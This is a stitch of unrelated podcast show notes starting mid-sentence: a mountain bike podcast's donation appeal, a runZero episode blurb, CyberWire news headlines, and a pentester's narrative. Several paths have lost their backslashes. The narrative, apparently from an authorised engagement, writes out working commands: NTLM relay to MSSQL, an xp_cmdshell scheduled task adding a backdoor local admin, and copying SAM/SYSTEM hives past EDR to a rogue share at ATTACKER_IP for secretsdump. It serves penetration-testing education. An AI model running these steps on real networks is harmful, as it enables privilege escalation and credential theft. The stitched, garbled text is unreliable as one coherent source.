a regular Patreon donation. Donations start from as little as £3 per month. That's less than £1 per episode and less than the price of a take away coffee. Every little counts and these donations will really help me keep the podcast going and hopefully take it to the next level. To help out, head here. Merch If you want to support the podcast and represent, then my webstore is the place to head. All products are 100% organic, shipped without plastics, and made with a supply chain that's using renewable energy. We now also have local manufacture for most products in the US as well as the UK. So check it out now over at downtimepodcast.com/shop. Newsletter If you want a bit more Downtime in your life, then you can join my newsletter where I'll provide you with a bit of behind the scenes info on the podcast, interesting bits and pieces from around the mountain bike world, some mini-reviews of products that I've been using and like, partner offers and more. You can do that over at downtimepodcast.com/newsletter. Follow Us Give us a follow on Instagram @downtimepodcast or Facebook @downtimepodcast to keep up to date and chat in the comments. For everything video, including riding videos, bike checks and more, subscribe over at youtube.com/downtimemountainbikepodcast. Are you enjoying the podcast? If so, then don't forget to follow it. Episodes will get delivered to your device as soon as it's available and it's totally free. You'll find all the links you need at downtimepodcast.com/follow. You can find us on Apple Podcast, Spotify, Google and most of the podcast apps out there. Our back catalogue of amazing episodes is available at downtimepodcast.com/episodes Photo - Sven Martin

In this sponsored Soap Box edition of the Risky Business podcast, industry legend HD Moore joins the show to talk about runZero's major push into vulnerability management. With its new Nuclei integration, runZero is now able to get a very accurate picture of what's vulnerable in your environment, without spraying highly privileged credentials at attackers on your network. It can also integrate with your EDR platform, and other data sources, to give you powerful visibility into the true state of things on your network and in your cloud. This episode is also available on Youtube. Show notes

Happy Friday! Today's another hot pile of pentest pwnage. To make it easy on myself I'm going to share the whole narrative that I wrote up for someone else: I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/. I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can't explain is the first relay got me a shell in the context of NT SERVICEMSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITYSYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance". Turns out a DA wasn't interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn't copy reg hives out of it – EDR was unhappy. In the end, the bizarre combo of things that did the trick was: Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!' From the victim system, I did an mklink to the shadow copy: mklink /d C:tempbackup ?GLOBALROOTDeviceHarddiskVolumeShadowCopy123 From command prompt on the victim system, I authenticated to my rogue share: net use ATTACKER_IPshare /user:toteslegit DontMindMeLOL! Then I did a copy command for the first hive: copy SYSTEM my.attackingipsys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed! I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!! Finishing move: secretsdump -sam sam.test -system sys.test LOCAL

HR software giant Workday discloses a data breach. Researchers uncover a zero-day in Elastic's EDR software. Ghost-tapping is an emerging fraud technique where cybercriminals use NFC relay attacks to exploit stolen payment card data. Germany may be on a path to ban ad blockers. A security researcher documents multiple serious flaws in McDonald's systems. There's a new open-source framework for testing 5G security flaws. New York's Attorney General sues the banks behind Zelle over fraud allegations. The DOJ charges the alleged Zeppelin ransomware operator and seizes over $2.8 million in cryptocurrency. Tim Starks from CyberScoop discusses the overlooked changes that two Trump executive orders could bring to cybersecurity. Bots build their own echo chambers. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn.CyberWire Guest Today we have Tim Starks from CyberScoop discussing the overlooked changes that two Trump executive orders could bring to cybersecurity. Selected Reading HR giant Workday discloses data breach after Salesforce attack (Bleeping Computer) Researchers report zero-day vulnerability in Elastic Endpoint Detection and Respons Driver that enables system compromise (Beyond Machines) Ghost-Tapping and the Chinese Cybercriminal Retail Fraud Ecosystem (Recorded Future) Is Germany on the Brink of Banning Ad Blockers? User Freedom, Privacy, and Security Is At Risk. (Open Policy & Advocacy) How I Hacked McDonald's (Their Security Contact Was Harder to Find Than Their Secret Sauce Recipe) (bobdahacker) Boffins say tool can sniff 5G traffic, launch 'attacks' without using rogue base stations (The Register) New York claims Zelle's shoddy security enabled a billion dollars in scams  (The Verge) US Seizes $2.8 Million From Zeppelin Ransomware Operator (SecurityWeek) Researchers Made a Social Media Platform Where Every User Was AI. The Bots Ended Up at War (Gizmodo) Audience Survey Complete our annual audience survey before August 31. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices